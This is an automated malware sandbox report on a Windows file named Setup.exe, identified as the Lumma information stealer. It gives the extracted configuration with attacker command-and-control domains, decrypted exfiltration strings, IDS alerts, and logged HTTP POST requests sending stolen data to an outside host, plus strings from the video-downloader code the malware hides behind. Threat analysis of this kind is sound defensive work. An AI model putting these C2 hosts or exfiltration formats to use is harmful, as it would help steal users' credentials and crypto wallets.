Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1584503
MD5:2f84c8a115eb4fa477054b3915d6d156
SHA1:0aa8a86694bf487867861c8d51919b558b62ef3c
SHA256:a13eeb5717208e256a8b59d7baa24754f0b81f9fa9d7e7a0cf60b07fc0e489dd
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 2F84C8A115EB4FA477054B3915D6D156)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "sloppymisskr.click", "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--TRON"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
            • 0x51ba7:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
            00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T17:54:15.384083+010020283713Unknown Traffic192.168.2.449748104.21.90.109443TCP
              2025-01-05T17:54:16.406362+010020283713Unknown Traffic192.168.2.449749104.21.90.109443TCP
              2025-01-05T17:54:18.182604+010020283713Unknown Traffic192.168.2.449750104.21.90.109443TCP
              2025-01-05T17:54:19.620755+010020283713Unknown Traffic192.168.2.449752104.21.90.109443TCP
              2025-01-05T17:54:21.248372+010020283713Unknown Traffic192.168.2.449753104.21.90.109443TCP
              2025-01-05T17:54:24.192636+010020283713Unknown Traffic192.168.2.449754104.21.90.109443TCP
              2025-01-05T17:54:25.189162+010020283713Unknown Traffic192.168.2.449755104.21.90.109443TCP
              2025-01-05T17:54:27.191854+010020283713Unknown Traffic192.168.2.449756104.21.90.109443TCP
              2025-01-05T17:54:29.571028+010020283713Unknown Traffic192.168.2.449757104.21.90.109443TCP
              2025-01-05T17:54:30.792272+010020283713Unknown Traffic192.168.2.449758185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T17:54:15.895405+010020546531A Network Trojan was detected192.168.2.449748104.21.90.109443TCP
              2025-01-05T17:54:16.894231+010020546531A Network Trojan was detected192.168.2.449749104.21.90.109443TCP
              2025-01-05T17:54:30.024044+010020546531A Network Trojan was detected192.168.2.449757104.21.90.109443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T17:54:15.895405+010020498361A Network Trojan was detected192.168.2.449748104.21.90.109443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T17:54:16.894231+010020498121A Network Trojan was detected192.168.2.449749104.21.90.109443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T17:54:20.186521+010020480941Malware Command and Control Activity Detected192.168.2.449752104.21.90.109443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T17:54:27.196515+010028438641A Network Trojan was detected192.168.2.449756104.21.90.109443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://cegu.shop:443/8574262446/ph.txtAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txt/PAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtf1Avira URL Cloud: Label: malware
              Source: https://cegu.shop/4QAvira URL Cloud: Label: malware
              Source: https://cegu.shop/1BAvira URL Cloud: Label: malware
              Source: https://cegu.shop//Avira URL Cloud: Label: malware
              Found malware configuration
              Source: Setup.exe.6860.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "sloppymisskr.click", "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--TRON"}
              Multi AV Scanner detection for submitted file
              Source: Setup.exeReversingLabs: Detection: 15%
              Source: Setup.exeVirustotal: Detection: 8%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.7% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: sloppymisskr.click
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--TRON
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49756 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 104.21.90.109:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: sloppymisskr.click
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.90.109:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 185.161.251.21:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LZCUHPS6RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18108Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YDRKR53H0UXY5EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UMY21CEW4IOIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20400Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LI1MZWAEHWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7081Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7NCL0BD3V0SN8TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 942Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1T1XCH02CDNFYJ80YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586961Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: sloppymisskr.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: Setup.exeString found in binary or memory: ID: %sPlease copy and paste the page source code of the video that you want to download into this boxCXMediaGrabThreadCXMediaSubstreamDownloadThreadconcat-callback_context-callback_window-y-strict-fs%I64d-c-target-filter_complex-loopgif-hls_segment_filename-hls_list_size-lhls-preset-sn-codec:s-an-filter:avolume=%.2f-pre:a-profile:a-bsf:a-q:a-vol-b:a-ar-ac-tag:a-codec:a-vn-filter:vcolorchannelmixer=.393:.769:.189:0:.349:.686:.168:0:.272:.534:.131negatehue=s=0hflipvfliptranspose=1transpose=2,transpose=2transpose=2crop=w=%d:h=%d:x=%d:y=%dcrop=w=%d:h=%d,-pre:v-profile:v-bsf:v-vsync-frames:v-q:v-b:v-aspect-s-pix_fmt-tag:v-codec:v-map%d:%d-i"%s"-itsoffset-t-safe-f-ss-r%d/%d-bufsize-threads-hwaccellibfdk_aacaaccopydropaac_adtstoascconcat:image2animated-imagecaptionxwd_pipexbm_pipexpm_pipewebp_pipevbn_pipetiff_pipesunrast_pipesvg_pipesgi_pipeqoi_pipeqdraw_pipepsd_pipeppm_pipepng_pipepictor_pipephotocd_pipephm_pipepgx_pipepgm_pipepgmyuv_pipepfm_pipepcx_pipepbm_pipepam_pipejpegxl_pipejpegls_pipejpeg_pipej2k_pipegif_pipegem_pipeexr_pipedpx_pipedds_pipecri_pipebmp_pipeimage2_brender_piximage2_alias_piximage2pipeapngtextttyProfileCodecBitRate%s\avcodec-56.dll%s\avcodec-57.dll%s\avcodec-58.dll%s\avcodec-59.dll%s\avcodec-60.dllMediaPlay.exe%s\MediaPlay.exe\PresetsMediaEncode.exe%s\MediaEncode.exeMediaProbe.exe%s\MediaProbe.exe-probesize-analyzeduration-print_format-show_entries-count_frames-show_streams-show_format-loglevelquietDURATIONundlanguagedefaultdispositionchannelssample_ratesample_fmt%d:%dsample_aspect_ratior_frame_rateavg_frame_rateheightwidthpix_fmtnb_read_framesnb_frames%d/%dtime_basetrueis_avcsubtitleaudiovideocodec_typecodec_tag_stringprofilecodec_nameindexstreamsencodertagsprobe_scorebit_ratesizedurationstart_timeformat_namenb_programsnb_streamsformatjson@%s--nio-callback-context--nio-callback-window-#--parallel-max--parallel-immediate--parallel--dump-header--styled-output--retry--speed-time--speed-limit--connect-timeout--compressed--head--nio-local-pos--nio-local-allocated--output--range--location--data--header--cookie--referer--user-agent--proxy--http%s--insecure--cacertaccept-rangescontent-encodingcontent-lengthlocationbytesSet-Cookieset-cookieHTTP/Mozilla/5.0 (Windows NT 10; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0deflategzip1.2.5https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type: %sSec-Fetch-Mode: %sAccept-Encoding: %sAccept-Charset: %sAccept-Language: %sAccept: %sCHttpIOThread equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: ID: %shttps://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease enter one URL per linePlease enter at least one URL.You may enter an URL or ID. equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: TcUhTc8Tc0Tc_0.1MEDIA_CONNECT_FRONTENDmediaconnect2.0TVHTML5_SIMPLY_EMBEDDED_PLAYERtv_embedded7.20240724.13.00TVHTML5tv2.20240726.01.00MWEBmwebcom.google.ios.ytcreator/24.30.100 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)IOS_CREATORios_creatorcom.google.ios.youtubemusic/7.08.2 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)7.08.2IOS_MUSICAIzaSyBAETezhkwP0ZWA02RsqT1zu78Fpt0bC_sios_musiccom.google.ios.youtube/17.33.2 (iPhone14,3; U; CPU iOS 15_6 like Mac OS X)iPhone14,317.33.2IOS_MESSAGES_EXTENSIONios_embedded17.5.1.21F90iPhonecom.google.ios.youtube/19.29.1 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)iPhone16,219.29.1IOSAIzaSyB-63vPrdThhKuerbB2N_l7Kwwcxj6yUAcioscom.google.android.apps.youtube.producer/0.111.1 (Linux; U; Android 11) gzip0.111.1ANDROID_PRODUCERandroid_producer2AMBcom.google.android.youtube/1.9 (Linux; U; Android 11) gzip1.9ANDROID_TESTSUITEandroid_testsuite12Lcom.google.android.apps.youtube.vr.oculus/1.57.29 (Linux; U; Android 12L; eureka-user Build/SQ3A.220605.009.A1) gzipQuest 3Oculus1.57.29ANDROID_VRandroid_vrcom.google.android.apps.youtube.creator/24.30.100 (Linux; U; Android 11) gzip24.30.100ANDROID_CREATORAIzaSyD_qjV8zaaUMehtLkrKFgVeSX_Iqbtyws8android_creatorcom.google.android.apps.youtube.music/7.11.50 (Linux; U; Android 11) gzip7.11.50ANDROID_MUSICAIzaSyAOghZGza2MQSZkY_zfZ370N-PUdXEo8AIandroid_musiccom.google.android.youtube/17.31.35 (Linux; U; Android 11) gzip17.31.35ANDROID_EMBEDDED_PLAYERAIzaSyCjc_pVEDi4qsv5MtC2dMXzpIaDoRFLsxwandroid_embedded11com.google.android.youtube/19.29.37 (Linux; U; Android 11) gzip19.29.37ANDROIDAIzaSyA8eiZmM1FaDVjRy-df2KTyQ_vz_yYM39wandroid1.20240723.03.00WEB_CREATORAIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMoweb_creator1.20240724.00.00WEB_REMIXmusic.youtube.comAIzaSyC9XL3ZjWddXya6X74dJoCTL-WEYFDNX30web_music1.20240723.01.00WEB_EMBEDDED_PLAYERweb_embeddedMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15,gzip(gfe)2.20240726.00.00web_safari2.20240910.03.00WEBAIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8webwww.youtube.comAIzaSyDCU8hByM-4DrUqRUYnGn-3llEO78bcxq8streamTypesgoap/gir%3Dyes%3Bitag%3Dsgovp/gir%3Dyes%3Bitag%3D equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: fc|fcpfcdfcXfcLfc@fc4fc(fcCgIQCQ==CgIQCA==CgIQBw==CgIQBg==CgIQBQ==CgIQBA==CgIQAw==CgIQAg==CgIQAQ==CgIQAA==https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Youtube-Client-Namegzip, deflateplaybackContextcontentPlaybackContexthtml5PreferenceHTML5_PREF_WANTScontextclientutcOffsetMinutestimeZoneUTChlenuserAgentdeviceModelandroidSdkVersionclientVersionclientNameracyCheckOkcontentCheckOkvideoIdhttps://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-IdcontinuationclickTrackingclickTrackingParamsuseSsluserlockedSafetyModeconfigInfoappInstallDataoriginalUrlacceptHeaderbrowserVersionbrowserNameplatformosVersionosNameclientFormFactordeviceExperimentIddeviceMakevisitorDataremoteHostglUSwgYCCAA=browseIdhttps://www.youtube.com/youtubei/v1/search?key=%s&prettyPrint=falseEgIQAQ==queryAccept-Encoding: identity equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManifestUrldashManifestUrladaptiveFormatsformatsdrmFamiliesencryptionapproxDurationMscontentLengthaverageBitrateaudioChannelsaudioSampleRateaudioQualityitagsspsspurlciphersignatureCiphercaptionsvideoDetailsstreamingData\u003d="originalUrl":"",https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.com/vi/%s/mqdefault.jpghttps://www.youtube.com/watch?v=%ssingleColumnBrowseResultsRenderertwoColumnBrowseResultsRenderercontentscontinuationContentsonResponseReceivedActionsrunsplaylistIdplaylistHeaderRendererheadercontinuationsplaylistVideoRendererplaylistVideoListRenderersectionListRenderercontenttabRenderertabssimpleTextcontinuationItemRendereritemSectionRenderercontinuationItemsappendContinuationItemsActionplaylistVideoListContinuationthumbnailstokencontinuationCommandcontinuationEndpointnextContinuationDatahttps://www.youtube.com/embed/%s?autoplay=1&rel=0publishedTimeTextownerTextviewCountTextlengthTextlabelaccessibilityDataaccessibilityvshelfRendererreelShelfRenderersearchPyvRenderervideoRendererprimaryContentsreloadContinuationDataelementRenderercompactVideoRenderersectionListContinuationtwoColumnSearchResultsRendereronResponseReceivedCommandsestimatedResults272138https://video.google.com/timedtext?hl=en&type=list&v=%shttps://www.youtube.com/api/timedtext?type=%s&name=%s&fmt=%s&lang=%s&v=%slang_translatedlang_originallang_codenametracktranscript_list18LOGIN_REQUIREDUNPLAYABLEERRORstatushttps://www.youtube.com/results?search_query=%s&page=%dwindow["ytInitialData"]var ytInitialData ="sectionListRenderer":YouTubeytimg.comyoutu.beytcfg.setyoutube-nocookie.comindex=video_ids=/user//vi/ytimg.youtu.be//clip//live//shorts/v=list=p=/channel/youtube.com/shorts/youtube-nocookie.com/embed/youtube.com/embed//watch?v=youtube.com/v/video_idyoutube.VISITOR_INFO1_LIVEYSCGPShl=%s&tz=%sUTCPREFPENDING+CONSENTSOCS__Secure-3PSIDYES+cb.20210328-17-p0.en+FX+%dPREF=%s; CONSENT=%sPREF=%sPREF=%s; CONSENT=%s; GPS=%s; YSC=%s; VISITOR_INFO1_LIVE=%sPREF=%s; GPS=%s; YSC=%s; VISITOR_INFO1_LIVE=%s&ratebypass=yesratebypass=yesratebypassn= equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: zcABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$%3Dsig?n=;n=&n=?sig=?signature=;sig=;signature=&sig=&signature=<INPUT>%s\youtube.com-n.js%s\youtube.com-sig.js%s/youtube.com-n.jshttp://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar %s%s; input="<INPUT>"; output=%s(input); console.log(output);Decipher_n=function(enhanced_except_var %s={%s};var var %s=function(a){%s}; input="<INPUT>"; output=%s(input); console.log(output);Decipher_sig;a=a.split("")jsUrlWEB_PLAYER_CONTEXT_CONFIG_ID_KEVLAR_WATCHWEB_PLAYER_CONTEXT_CONFIGSPLAYER_JS_URLXSRF_TOKENXSRF_FIELD_NAMEVISITOR_DATASIGNIN_URLSERVER_NAMEPAGE_CLPAGE_BUILD_LABELLOGGED_INclient.nameLATEST_ECATCHER_SERVICE_TRACKING_PARAMSuserInterfaceThemeINNERTUBE_CONTEXTINNERTUBE_CONTEXT_HLINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CLIENT_VERSIONINNERTUBE_CLIENT_NAMEINNERTUBE_API_VERSIONINNERTUBE_API_KEYplayerParamswatchEndpointnavigationEndpointswebPrefetchDatawebResponseContextExtensionDataresponseContextbrowseEndpointnavigationEndpointfeaturedChannelplayerAnnotationsExpandedRendererannotationstrackingParamsisPrivateauthorviewCountshortDescriptionchannelIdcontextParamsplayabilityStatusoriginalUrljsUrlresponseContextytInitialData =playabilityStatusytInitialPlayerResponse ="playabilityStatus":"videoDetails":"streamingData":"captions":https://www.google.com/Google Searchgoogle.searchgoogle.com/url?url=https://www.yahoo.com/Yahoo Searchyahoo.searchvideo.search.yahoo.comrurl=youtube.com.InnerTubeyoutube.com.WebPageContentComponentVIDEOpornhubfacebookextractorvcodecextHTML5JWPlayerposter="audio/wavaudio/oggaudio/mpeg<audio</audio>https://%s%saddParam('flashvars',addParam("flashvars",var videoFile="var videoFile='var filepath = "var filepath = 'jwplayermp4aavc1av1vp9vorbisvp8h264Auto close within 00:%02dEnglishTranslatedOriginalCodeLanguages1.0.0M3U8<meta name="title" content="<meta name="twitter:title" content="<meta property="og:image:secure_url" content="<meta 